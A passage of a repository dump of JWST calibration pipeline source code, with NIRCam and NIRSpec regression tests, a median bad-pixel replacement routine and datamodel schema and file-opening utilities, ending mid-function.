"/jwst/tests_nightly/general/nircam/test_tso3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline import Tso3Pipeline\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestTso3Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_caltso3', 'truth']\n test_dir = 'test_caltso3'\n\n def test_tso3_pipeline_nrc1(self):\n \"\"\"Regression test of calwebb_tso3 pipeline on NIRCam simulated data.\n\n Default imaging mode outlier_detection will be tested here.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n \"jw93065-a3001_20170511t111213_tso3_001_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = Tso3Pipeline()\n step.scale_detection = False\n step.outlier_detection.weight_type = 'exptime'\n step.outlier_detection.pixfrac = 1.0\n step.outlier_detection.kernel = 'square'\n step.outlier_detection.fillval = 'INDEF'\n step.outlier_detection.nlow = 0\n step.outlier_detection.nhigh = 0\n step.outlier_detection.maskpt = 0.7\n step.outlier_detection.grow = 1\n step.outlier_detection.snr = '4.0 3.0'\n step.outlier_detection.scale = '0.5 0.4'\n step.outlier_detection.backg = 0.0\n step.outlier_detection.save_intermediate_results = False\n step.outlier_detection.resample_data = False\n step.outlier_detection.good_bits = 4\n step.extract_1d.smoothing_length = 0\n step.extract_1d.bkg_order = 0\n\n step.run(asn_file)\n\n outputs = [\n # Compare level-2c product\n ('jw93065002001_02101_00001_nrca1_a3001_crfints.fits',\n 'jw93065002001_02101_00001_nrca1_a3001_crfints_ref.fits',\n ['primary', 'sci', 'dq', 'err']),\n\n # Compare level-3 product\n ('jw93065-a3001_t1_nircam_f150w-wlp8_phot.ecsv',\n 'jw93065-a3001_t1_nircam_f150w-wlp8_phot_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n\n\n def test_tso3_pipeline_nrc2(self):\n \"\"\"Regression test of calwebb_tso3 pipeline on NIRCam simulated data.\n\n Scaled imaging mode outlier_detection will be tested here.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n \"jw93065-a3002_20170511t111213_tso3_001_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = Tso3Pipeline()\n step.scale_detection = True\n step.outlier_detection.weight_type = 'exptime'\n step.outlier_detection.pixfrac = 1.0\n step.outlier_detection.kernel = 'square'\n step.outlier_detection.fillval = 'INDEF'\n step.outlier_detection.nlow = 0\n step.outlier_detection.nhigh = 0\n step.outlier_detection.maskpt = 0.7\n step.outlier_detection.grow = 1\n step.outlier_detection.snr = '4.0 3.0'\n step.outlier_detection.scale = '0.5 0.4'\n step.outlier_detection.backg = 0.0\n step.outlier_detection.save_intermediate_results = False\n step.outlier_detection.resample_data = False\n step.outlier_detection.good_bits = 4\n step.extract_1d.smoothing_length = 0\n step.extract_1d.bkg_order = 0\n\n step.run(asn_file)\n outputs = [\n # Compare level-2c product\n ('jw93065002002_02101_00001_nrca1_a3002_crfints.fits',\n 'jw93065002002_02101_00001_nrca1_a3002_crfints_ref.fits',\n ['primary', 'sci', 'dq', 'err']),\n\n # Compare level-3 product\n ('jw93065-a3002_t1_nircam_f150w-wlp8_phot.ecsv',\n 'jw93065-a3002_t1_nircam_f150w-wlp8_phot_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5908036828041077, "alphanum_fraction": 0.5946676731109619, "avg_line_length": 32.610389709472656, "blob_id": "f1eddfbde70ba14cb302d766019455e590a31e10", "content_id": "0d09b27f79ad07f316f0a2e451d7c744f6784b37", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2588, "license_type": "permissive", "max_line_length": 96, "num_lines": 77, "path": "/jwst/coron/median_replace_img.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Replace bad pixels with the median of the surrounding pixel and median fill\n the input images.\n \"\"\"\nimport logging\nimport numpy as np\n\nfrom jwst.datamodels import dqflags\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef median_fill_value(input_array, input_dq_array, bsize, xc, yc):\n \"\"\"\n Arguments:\n ----------\n input_array : ndarray\n Input array to filter.\n input_dq_array : ndarray\n Input data quality array\n bsize : scalar\n box size of the data to extract\n xc: scalar\n x position of the data extraction\n xc: scalar\n y position of the data extraction\n \"\"\"\n # set the half box size\n hbox = int(bsize/2)\n\n # Extract the region of interest for the data\n try:\n data_array = input_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n dq_array = input_dq_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n except IndexError:\n # If the box is outside the data return 0\n log.warning('Box for median filter is outside the data.')\n return 0.\n\n filtered_array = data_array[dq_array != dqflags.pixel['DO_NOT_USE']]\n median_value = np.median(filtered_array)\n\n if np.isnan(median_value):\n # If the median fails return 0\n log.warning('Median filter returned NaN setting value to 0.')\n median_value = 0.\n\n return median_value\n\n\ndef median_replace_img(img_model, box_size):\n \"\"\" Routine to replace any bad pixels with the median value of the surrounding\n pixels.\n Arguments:\n ----------\n input_array : image model\n Input array to filter.\n box_size : scalar\n box size for the median filter\n \"\"\"\n\n n_ints, _, _ = img_model.data.shape\n for nimage in range(n_ints):\n img_int = img_model.data[nimage]\n img_dq = img_model.dq[nimage]\n # check to see if any of the pixels are flagged\n if np.count_nonzero(img_dq == dqflags.pixel['DO_NOT_USE']) > 0:\n bad_locations = np.where(np.equal(img_dq, dqflags.pixel['DO_NOT_USE']))\n # fill the bad pixel values with the median of the data in a box region\n for i_pos in range(len(bad_locations[0])):\n x_box_pos = bad_locations[0][i_pos]\n y_box_pos = bad_locations[1][i_pos]\n median_fill = median_fill_value(img_int, img_dq, box_size, x_box_pos, y_box_pos)\n img_int[x_box_pos, y_box_pos] = median_fill\n\n img_model.data[nimage] = img_int\n\n return img_model\n" }, { "alpha_fraction": 0.6898876428604126, "alphanum_fraction": 0.6929775476455688, "avg_line_length": 31.660551071166992, "blob_id": "7af9845c903379d29ad5e3065d4e3bcb9b66bc38", "content_id": "fed2c65931a087e2ab70c22ff2c80fca717fa7ac", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3560, "license_type": "permissive", "max_line_length": 78, "num_lines": 109, "path": "/jwst/regtest/test_nirspec_masterbackground.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\npytestmark = pytest.mark.bigdata\n\n\ndef test_nirspec_fs_mbkg_user(rtdata, fitsdiff_default_kwargs):\n \"\"\"Run a test for NIRSpec FS data with a user-supplied background file.\"\"\"\n\n # Get user-supplied background\n user_background = \"v2_nrs_bkg_user_clean_x1d.fits\"\n rtdata.get_data(f\"nirspec/fs/{user_background}\")\n\n # Get input data\n rtdata.get_data(\"nirspec/fs/nrs_sci+bkg_cal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--user_background\", user_background]\n Step.from_cmdline(args)\n\n output = \"nrs_sci+bkg_master_background.fits\"\n rtdata.output = output\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_fs_mbkg_user/{output}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\ndef test_nirspec_ifu_mbkg_user(rtdata, fitsdiff_default_kwargs):\n \"\"\"Test NIRSpec IFU data with a user-supplied background file.\"\"\"\n # Get user-supplied background\n user_background = \"prism_bkg_x1d.fits\"\n rtdata.get_data(f\"nirspec/ifu/{user_background}\")\n\n # Get input data\n rtdata.get_data(\"nirspec/ifu/prism_sci_bkg_cal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--user_background\", user_background]\n Step.from_cmdline(args)\n\n output = \"prism_sci_bkg_master_background.fits\"\n rtdata.output = output\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_ifu_mbkg_user/{output}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\ndef test_nirspec_mos_mbkg_user(rtdata, fitsdiff_default_kwargs):\n \"\"\"Test NIRSpec MOS data with a user-supplied background file.\"\"\"\n # Get user-supplied background\n user_background = \"v2_nrs_mos_bkg_x1d.fits\"\n rtdata.get_data(f\"nirspec/mos/{user_background}\")\n\n # Get input data\n rtdata.get_data(\"nirspec/mos/nrs_mos_sci+bkg_cal.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--user_background\", user_background]\n Step.from_cmdline(args)\n\n output = \"nrs_mos_sci+bkg_master_background.fits\"\n rtdata.output = output\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_mos_mbkg_user/{output}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\[email protected](\n 'output_file',\n ['ifu_prism_source_on_NRS1_master_background.fits',\n 'ifu_prism_source_off_NRS1_o001_masterbg.fits'],\n ids=[\"on-source\", \"off-source\"]\n)\ndef test_nirspec_ifu_mbkg_nod(rtdata, fitsdiff_default_kwargs, output_file):\n \"\"\"Test NIRSpec IFU prism nodded data.\"\"\"\n # Get input data\n rtdata.get_asn(\"nirspec/ifu/nirspec_spec3_asn.json\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/master_background.cfg\", rtdata.input,\n \"--save_background=True\"]\n Step.from_cmdline(args)\n\n rtdata.output = output_file\n\n # Get the truth file\n rtdata.get_truth(f\"truth/test_nirspec_ifu_mbkg_nod/{output_file}\")\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5434117317199707, "alphanum_fraction": 0.5446975231170654, "avg_line_length": 29.584270477294922, "blob_id": "7bf61a5f527c057b36cc41b3ea0a04bdac519181", "content_id": "59d702c5fd9ee7a6dd45cf79c146c13f25628759", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16332, "license_type": "permissive", "max_line_length": 88, "num_lines": 534, "path": "/jwst/datamodels/properties.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport copy\nimport numpy as np\nfrom collections.abc import Mapping\nfrom astropy.io import fits\n\nfrom astropy.utils.compat.misc import override__dir__\n\nfrom asdf import yamlutil\nfrom asdf.tags.core import ndarray\n\nfrom . import util\nfrom . import validate\nfrom . import schema as mschema\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nlog.addHandler(logging.NullHandler())\n\n\n__all__ = ['ObjectNode', 'ListNode']\n\n\ndef _is_struct_array(val):\n return (isinstance(val, (np.ndarray, fits.FITS_rec)) and\n val.dtype.names is not None and val.dtype.fields is not None)\n\n\ndef _is_struct_array_precursor(val):\n return isinstance(val, list) and isinstance(val[0], tuple)\n\n\ndef _is_struct_array_schema(schema):\n return (isinstance(schema['datatype'], list) and\n any('name' in t for t in schema['datatype']))\n\n\ndef _cast(val, schema):\n val = _unmake_node(val)\n if val is None:\n return None\n\n if 'datatype' in schema:\n # Handle lazy array\n if isinstance(val, ndarray.NDArrayType):\n val = val._make_array()\n\n if (_is_struct_array_schema(schema) and len(val) and\n (_is_struct_array_precursor(val) or _is_struct_array(val))):\n # we are dealing with a structured array. Because we may\n # modify schema (to add shape), we make a deep copy of the\n # schema here:\n schema = copy.deepcopy(schema)\n\n for t, v in zip(schema['datatype'], val[0]):\n if not isinstance(t, Mapping):\n continue\n\n aval = np.asanyarray(v)\n shape = aval.shape\n val_ndim = len(shape)\n\n # make sure that if 'ndim' is specified for a field,\n # it matches the dimensionality of val's field:\n if 'ndim' in t and val_ndim != t['ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. \"\n \"Expected {}, got {}\".format(t['ndim'], val_ndim)\n )\n\n if 'max_ndim' in t and val_ndim > t['max_ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. \"\n \"Expected <= {}, got {}\".format(t['max_ndim'], val_ndim)\n )\n\n # if shape of a field's value is not specified in the schema,\n # add it to the schema based on the shape of the actual data:\n if 'shape' not in t:\n t['shape'] = shape\n\n dtype = ndarray.asdf_datatype_to_numpy_dtype(schema['datatype'])\n val = util.gentle_asarray(val, dtype)\n\n if dtype.fields is not None:\n val = _as_fitsrec(val)\n\n if 'ndim' in schema and len(val.shape) != schema['ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. Expected {}, got {}\"\n .format(schema['ndim'], len(val.shape)))\n\n if 'max_ndim' in schema and len(val.shape) > schema['max_ndim']:\n raise ValueError(\n \"Array has wrong number of dimensions. Expected <= {}, got {}\"\n .format(schema['max_ndim'], len(val.shape)))\n\n if isinstance(val, np.generic) and np.isscalar(val):\n val = val.item()\n\n return val\n\n\ndef _as_fitsrec(val):\n \"\"\"\n Convert a numpy record into a fits record if it is not one already\n \"\"\"\n if isinstance(val, fits.FITS_rec):\n return val\n else:\n coldefs = fits.ColDefs(val)\n uint = any(c._pseudo_unsigned_ints for c in coldefs)\n fits_rec = fits.FITS_rec(val)\n fits_rec._coldefs = coldefs\n # FITS_rec needs to know if it should be operating in pseudo-unsigned-ints mode,\n # otherwise it won't properly convert integer columns with TZEROn before saving.\n fits_rec._uint = uint\n return fits_rec\n\n\ndef _get_schema_type(schema):\n \"\"\"\n Create a list of types used by a schema and its subschemas when\n the subschemas are joined by combiners. Then return a type string\n if all the types are the same or 'mixed' if they differ\n \"\"\"\n def callback(subschema, path, combiner, types, recurse):\n if 'type' in subschema:\n types.append(subschema['type'])\n\n has_combiner = ('anyOf' in subschema.keys() or\n 'allOf' in subschema.keys())\n return not has_combiner\n\n types = []\n mschema.walk_schema(schema, callback, types)\n\n schema_type = None\n for a_type in types:\n if schema_type is None:\n schema_type = a_type\n elif schema_type != a_type:\n schema_type = 'mixed'\n break\n return schema_type\n\n\ndef _make_default_array(attr, schema, ctx):\n dtype = schema.get('datatype')\n if dtype is not None:\n dtype = ndarray.asdf_datatype_to_numpy_dtype(dtype)\n ndim = schema.get('ndim', schema.get('max_ndim'))\n default = schema.get('default', None)\n primary_array_name = ctx.get_primary_array_name()\n\n if attr == primary_array_name:\n if ctx.shape is not None:\n shape = ctx.shape\n elif ndim is not None:\n shape = tuple([0] * ndim)\n else:\n shape = (0,)\n else:\n if dtype.names is not None:\n if ndim is None:\n shape = (0,)\n else:\n shape = tuple([0] * ndim)\n default = None\n else:\n has_primary_array_shape = False\n if primary_array_name is not None:\n primary_array = getattr(ctx, primary_array_name, None)\n has_primary_array_shape = primary_array is not None\n\n if has_primary_array_shape:\n if ndim is None:\n shape = primary_array.shape\n else:\n shape = primary_array.shape[-ndim:]\n elif ndim is None:\n shape = (0,)\n else:\n shape = tuple([0] * ndim)\n\n array = np.empty(shape, dtype=dtype)\n if default is not None:\n array[...] = default\n return array\n\n\ndef _make_default(attr, schema, ctx):\n if 'max_ndim' in schema or 'ndim' in schema or 'datatype' in schema:\n return _make_default_array(attr, schema, ctx)\n elif 'default' in schema:\n return schema['default']\n else:\n schema_type = _get_schema_type(schema)\n if schema_type == 'object':\n return {}\n elif schema_type == 'array':\n return []\n else:\n return None\n\n\ndef _make_node(attr, instance, schema, ctx):\n if isinstance(instance, dict):\n return ObjectNode(attr, instance, schema, ctx)\n elif isinstance(instance, list):\n return ListNode(attr, instance, schema, ctx)\n else:\n return instance\n\n\ndef _unmake_node(obj):\n if isinstance(obj, Node):\n return obj.instance\n return obj\n\n\ndef _get_schema_for_property(schema, attr):\n subschema = schema.get('properties', {}).get(attr, None)\n if subschema is not None:\n return subschema\n for combiner in ['allOf', 'anyOf']:\n for subschema in schema.get(combiner, []):\n subsubschema = _get_schema_for_property(subschema, attr)\n if subsubschema != {}:\n return subsubschema\n return {}\n\n\ndef _get_schema_for_index(schema, i):\n items = schema.get('items', {})\n if isinstance(items, list):\n if i >= len(items):\n return {}\n else:\n return items[i]\n else:\n return items\n\ndef _find_property(schema, attr):\n subschema = _get_schema_for_property(schema, attr)\n if subschema == {}:\n find = False\n else:\n find = 'default' in subschema\n return find\n\nclass Node():\n def __init__(self, attr, instance, schema, ctx):\n self._name = attr\n self._instance = instance\n self._schema = schema\n self._ctx = ctx\n\n def _validate(self):\n instance = yamlutil.custom_tree_to_tagged_tree(self._instance,\n self._ctx._asdf)\n return validate.value_change(self._name, instance, self._schema,\n False, self._ctx._strict_validation)\n\n @property\n def instance(self):\n return self._instance\n\nclass ObjectNode(Node):\n @override__dir__\n def __dir__(self):\n return list(self._schema.get('properties', {}).keys())\n\n def __eq__(self, other):\n if isinstance(other, ObjectNode):\n return self._instance == other._instance\n else:\n return self._instance == other\n\n def __getattr__(self, attr):\n from . import ndmodel\n\n if attr.startswith('_'):\n raise AttributeError('No attribute {0}'.format(attr))\n\n schema = _get_schema_for_property(self._schema, attr)\n try:\n val = self._instance[attr]\n except KeyError:\n if schema == {}:\n raise AttributeError(\"No attribute '{0}'\".format(attr))\n val = _make_default(attr, schema, self._ctx)\n if val is not None:\n self._instance[attr] = val\n\n if isinstance(val, dict):\n # Meta is special cased to support NDData interface\n if attr == 'meta':\n node = ndmodel.MetaNode(attr, val, schema, self._ctx)\n else:\n node = ObjectNode(attr, val, schema, self._ctx)\n elif isinstance(val, list):\n node = ListNode(attr, val, schema, self._ctx)\n else:\n node = val\n\n return node\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n self.__dict__[attr] = val\n else:\n schema = _get_schema_for_property(self._schema, attr)\n if val is None:\n val = _make_default(attr, schema, self._ctx)\n val = _cast(val, schema)\n\n node = ObjectNode(attr, val, schema, self._ctx)\n if node._validate():\n self._instance[attr] = val\n\n def __delattr__(self, attr):\n if attr.startswith('_'):\n del self.__dict__[attr]\n else:\n schema = _get_schema_for_property(self._schema, attr)\n if not validate.value_change(attr, None, schema, False,\n self._ctx._strict_validation):\n return\n\n try:\n del self._instance[attr]\n except KeyError:\n raise AttributeError(\n \"Attribute '{0}' missing\".format(attr))\n\n def __iter__(self):\n return NodeIterator(self)\n\n def hasattr(self, attr):\n return attr in self._instance\n\n def items(self):\n # Return a (key, value) tuple for the node\n for key in self:\n val = self\n for field in key.split('.'):\n val = getattr(val, field)\n yield (key, val)\n\nclass ListNode(Node):\n def __cast(self, other):\n if isinstance(other, ListNode):\n return other._instance\n return other\n\n def __repr__(self):\n return repr(self._instance)\n\n def __eq__(self, other):\n return self._instance == self.__cast(other)\n\n def __ne__(self, other):\n return self._instance != self.__cast(other)\n\n def __contains__(self, item):\n return item in self._instance\n\n def __len__(self):\n return len(self._instance)\n\n def __getitem__(self, i):\n schema = _get_schema_for_index(self._schema, i)\n return _make_node(self._name, self._instance[i], schema, self._ctx)\n\n def __setitem__(self, i, val):\n schema = _get_schema_for_index(self._schema, i)\n val = _cast(val, schema)\n node = ObjectNode(self._name, val, schema, self._ctx)\n if node._validate():\n self._instance[i] = val\n\n def __delitem__(self, i):\n del self._instance[i]\n self._validate()\n\n def __getslice__(self, i, j):\n if isinstance(self._schema['items'], list):\n r = range(*(slice(i, j).indices(len(self._instance))))\n schema_parts = [\n _get_schema_for_index(self._schema, x) for x in r\n ]\n else:\n schema_parts = self._schema['items']\n schema = {'type': 'array', 'items': schema_parts}\n return _make_node(self._name, self._instance[i:j], schema, self._ctx)\n\n def __setslice__(self, i, j, other):\n parts = _unmake_node(other)\n parts = [_cast(x, _get_schema_for_index(self._schema, k))\n for (k, x) in enumerate(parts)]\n self._instance[i:j] = _unmake_node(other)\n self._validate()\n\n def __delslice__(self, i, j):\n del self._instance[i:j]\n self._validate()\n\n def append(self, item):\n schema = _get_schema_for_index(self._schema, len(self._instance))\n item = _cast(item, schema)\n node = ObjectNode(self._name, item, schema, self._ctx)\n if node._validate():\n self._instance.append(item)\n\n def insert(self, i, item):\n schema = _get_schema_for_index(self._schema, i)\n item = _cast(item, schema)\n node = ObjectNode(self._name, item, schema, self._ctx)\n if node._validate():\n self._instance.insert(i, item)\n\n def pop(self, i=-1):\n schema = _get_schema_for_index(self._schema, 0)\n x = self._instance.pop(i)\n return _make_node(self._name, x, schema, self._ctx)\n\n def remove(self, item):\n self._instance.remove(item)\n\n def count(self, item):\n return self._instance.count(item)\n\n def index(self, item):\n return self._instance.index(item)\n\n def reverse(self):\n self._instance.reverse()\n\n def sort(self, *args, **kwargs):\n self._instance.sort(*args, **kwargs)\n\n def extend(self, other):\n for part in _unmake_node(other):\n self.append(part)\n\n def item(self, **kwargs):\n assert isinstance(self._schema['items'], dict)\n node = ObjectNode(self._name, kwargs, self._schema['items'],\n self._ctx)\n if not node._validate():\n node = None\n return node\n\nclass NodeIterator:\n \"\"\"\n An iterator for a node which flattens the hierachical structure\n \"\"\"\n def __init__(self, node):\n self.key_stack = []\n self.iter_stack = [iter(node._instance.items())]\n\n def __iter__(self):\n return self\n\n def __next__(self):\n while self.iter_stack:\n try:\n key, val = next(self.iter_stack[-1])\n except StopIteration:\n self.iter_stack.pop()\n if self.iter_stack:\n self.key_stack.pop()\n continue\n\n if isinstance(val, dict):\n self.key_stack.append(key)\n self.iter_stack.append(iter(val.items()))\n else:\n return '.'.join(self.key_stack + [key])\n\n raise StopIteration\n\ndef put_value(path, value, tree):\n \"\"\"\n Put a value at the given path into tree, replacing it if it is\n already present.\n\n Parameters\n ----------\n path : list of str or int\n The path to the element.\n\n value : any\n The value to place\n\n tree : JSON object tree\n \"\"\"\n cursor = tree\n for i in range(len(path) - 1):\n part = path[i]\n if isinstance(part, int):\n while len(cursor) <= part:\n cursor.append({})\n cursor = cursor[part]\n else:\n if isinstance(path[i + 1], int) or path[i + 1] == 'items':\n cursor = cursor.setdefault(part, [])\n else:\n cursor = cursor.setdefault(part, {})\n\n if isinstance(path[-1], int):\n while len(cursor) <= path[-1]:\n cursor.append({})\n cursor[path[-1]] = value\n\n\ndef merge_tree(a, b):\n \"\"\"\n Merge elements from tree `b` into tree `a`.\n \"\"\"\n def recurse(a, b):\n if isinstance(b, dict):\n if not isinstance(a, dict):\n return copy.deepcopy(b)\n for key, val in b.items():\n a[key] = recurse(a.get(key), val)\n return a\n return copy.deepcopy(b)\n\n recurse(a, b)\n return a\n" }, { "alpha_fraction": 0.5733563899993896, "alphanum_fraction": 0.575683057308197, "avg_line_length": 29.637474060058594, "blob_id": "bce51353c8dc620af547c4e59efe62b0934ae7f2", "content_id": "22dafbd48040c159f8dc01c7c26ff9acdfdf4b94", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15043, "license_type": "permissive", "max_line_length": 119, "num_lines": 491, "path": "/jwst/datamodels/util.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nVarious utility functions and data types\n\"\"\"\n\nimport sys\nimport warnings\nimport os\nfrom os.path import basename\n\nimport numpy as np\nfrom astropy.io import fits\n\nfrom ..lib import s3_utils\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nlog.addHandler(logging.NullHandler())\n\n\nclass NoTypeWarning(Warning):\n pass\n\ndef open(init=None, memmap=False, **kwargs):\n \"\"\"\n Creates a DataModel from a number of different types\n\n Parameters\n ----------\n init : shape tuple, file path, file object, astropy.io.fits.HDUList,\n numpy array, dict, None\n\n - None: A default data model with no shape\n\n - shape tuple: Initialize with empty data of the given shape\n\n - file path: Initialize from the given file (FITS , JSON or ASDF)\n\n - readable file object: Initialize from the given file object\n\n - astropy.io.fits.HDUList: Initialize from the given\n `~astropy.io.fits.HDUList`\n\n - A numpy array: A new model with the data array initialized\n to what was passed in.\n\n - dict: The object model tree for the data model\n\n memmap : bool\n Turn memmap of FITS file on or off. (default: False). Ignored for\n ASDF files.\n\n kwargs : dict\n Additional keyword arguments passed to lower level functions. These arguments\n are generally file format-specific. Arguments of note are:\n\n - FITS\n\n skip_fits_update - bool or None\n `True` to skip updating the ASDF tree from the FITS headers, if possible.\n If `None`, value will be taken from the environmental SKIP_FITS_UPDATE.\n Otherwise, the default value is `True`.\n\n Returns\n -------\n model : DataModel instance\n \"\"\"\n\n from . import model_base\n from . import filetype\n\n # Initialize variables used to select model class\n\n hdulist = {}\n shape = ()\n file_name = None\n file_to_close = None\n\n # Get special cases for opening a model out of the way\n # all special cases return a model if they match\n\n if init is None:\n return model_base.DataModel(None)\n\n elif isinstance(init, model_base.DataModel):\n # Copy the object so it knows not to close here\n return init.__class__(init)\n\n elif isinstance(init, (str, bytes)) or hasattr(init, \"read\"):\n # If given a string, presume its a file path.\n # if it has a read method, assume a file descriptor\n\n if isinstance(init, bytes):\n init = init.decode(sys.getfilesystemencoding())\n\n file_name = basename(init)\n file_type = filetype.check(init)\n\n if file_type == \"fits\":\n if s3_utils.is_s3_uri(init):\n hdulist = fits.open(s3_utils.get_object(init))\n else:\n hdulist = fits.open(init, memmap=memmap)\n file_to_close = hdulist\n\n elif file_type == \"asn\":\n # Read the file as an association / model container\n from . import container\n return container.ModelContainer(init, **kwargs)\n\n elif file_type == \"asdf\":\n # Read the file as asdf, no need for a special class\n return model_base.DataModel(init, **kwargs)\n\n elif isinstance(init, tuple):\n for item in init:\n if not isinstance(item, int):\n raise ValueError(\"shape must be a tuple of ints\")\n shape = init\n\n elif isinstance(init, np.ndarray):\n shape = init.shape\n\n elif isinstance(init, fits.HDUList):\n hdulist = init\n\n elif is_association(init) or isinstance(init, list):\n from . import container\n return container.ModelContainer(init, **kwargs)\n\n # If we have it, determine the shape from the science hdu\n if hdulist:\n # So we don't need to open the image twice\n init = hdulist\n info = init.fileinfo(0)\n if info is not None:\n file_name = info.get('filename')\n\n try:\n hdu = hdulist[('SCI', 1)]\n except (KeyError, NameError):\n shape = ()\n else:\n if hasattr(hdu, 'shape'):\n shape = hdu.shape\n else:\n shape = ()\n\n # First try to get the class name from the primary header\n new_class = _class_from_model_type(hdulist)\n has_model_type = new_class is not None\n\n # Special handling for ramp files for backwards compatibility\n if new_class is None:\n new_class = _class_from_ramp_type(hdulist, shape)\n\n # Or get the class from the reference file type and other header keywords\n if new_class is None:\n new_class = _class_from_reftype(hdulist, shape)\n\n # Or Get the class from the shape\n if new_class is None:\n new_class = _class_from_shape(hdulist, shape)\n\n # Throw an error if these attempts were unsuccessful\n if new_class is None:\n raise TypeError(\"Can't determine datamodel class from argument to open\")\n\n # Log a message about how the model was opened\n if file_name:\n log.debug(f'Opening {file_name} as {new_class}')\n else:\n log.debug(f'Opening as {new_class}')\n\n # Actually open the model\n model = new_class(init, **kwargs)\n\n # Close the hdulist if we opened it\n if file_to_close is not None:\n model._files_to_close.append(file_to_close)\n\n if not has_model_type:\n class_name = new_class.__name__.split('.')[-1]\n if file_name:\n warnings.warn(f\"model_type not found. Opening {file_name} as a {class_name}\",\n NoTypeWarning)\n try:\n delattr(model.meta, 'model_type')\n except AttributeError:\n pass\n\n return model\n\n\ndef _class_from_model_type(hdulist):\n \"\"\"\n Get the model type from the primary header, lookup to get class\n \"\"\"\n from . import _defined_models as defined_models\n\n if hdulist:\n primary = hdulist[0]\n model_type = primary.header.get('DATAMODL')\n\n if model_type is None:\n new_class = None\n else:\n new_class = defined_models.get(model_type)\n else:\n new_class = None\n\n return new_class\n\n\ndef _class_from_ramp_type(hdulist, shape):\n \"\"\"\n Special check to see if file is ramp file\n \"\"\"\n if not hdulist:\n new_class = None\n else:\n if len(shape) == 4:\n try:\n hdulist['DQ']\n except KeyError:\n from . import ramp\n new_class = ramp.RampModel\n else:\n new_class = None\n else:\n new_class = None\n\n return new_class\n\n\ndef _class_from_reftype(hdulist, shape):\n \"\"\"\n Get the class name from the reftype and other header keywords\n \"\"\"\n if not hdulist:\n new_class = None\n\n else:\n primary = hdulist[0]\n reftype = primary.header.get('REFTYPE')\n if reftype is None:\n new_class = None\n\n else:\n from . import reference\n if len(shape) == 0:\n new_class = reference.ReferenceFileModel\n elif len(shape) == 2:\n new_class = reference.ReferenceImageModel\n elif len(shape) == 3:\n new_class = reference.ReferenceCubeModel\n elif len(shape) == 4:\n new_class = reference.ReferenceQuadModel\n else:\n new_class = None\n\n return new_class\n\n\ndef _class_from_shape(hdulist, shape):\n \"\"\"\n Get the class name from the shape\n \"\"\"\n if len(shape) == 0:\n from . import model_base\n new_class = model_base.DataModel\n elif len(shape) == 4:\n from . import quad\n new_class = quad.QuadModel\n elif len(shape) == 3:\n from . import cube\n new_class = cube.CubeModel\n elif len(shape) == 2:\n try:\n hdulist[('SCI', 2)]\n except (KeyError, NameError):\n # It's an ImageModel\n from . import image\n new_class = image.ImageModel\n else:\n # It's a MultiSlitModel\n from . import multislit\n new_class = multislit.MultiSlitModel\n else:\n new_class = None\n\n return new_class\n\n\ndef can_broadcast(a, b):\n \"\"\"\n Given two shapes, returns True if they are broadcastable.\n \"\"\"\n for i in range(1, min(len(a), len(b)) + 1):\n adim = a[-i]\n bdim = b[-i]\n\n if not (adim == 1 or bdim == 1 or adim == bdim):\n return False\n\n return True\n\n\ndef to_camelcase(token):\n return ''.join(x.capitalize() for x in token.split('_-'))\n\n\ndef is_association(asn_data):\n \"\"\"\n Test if an object is an association by checking for required fields\n \"\"\"\n if isinstance(asn_data, dict):\n if 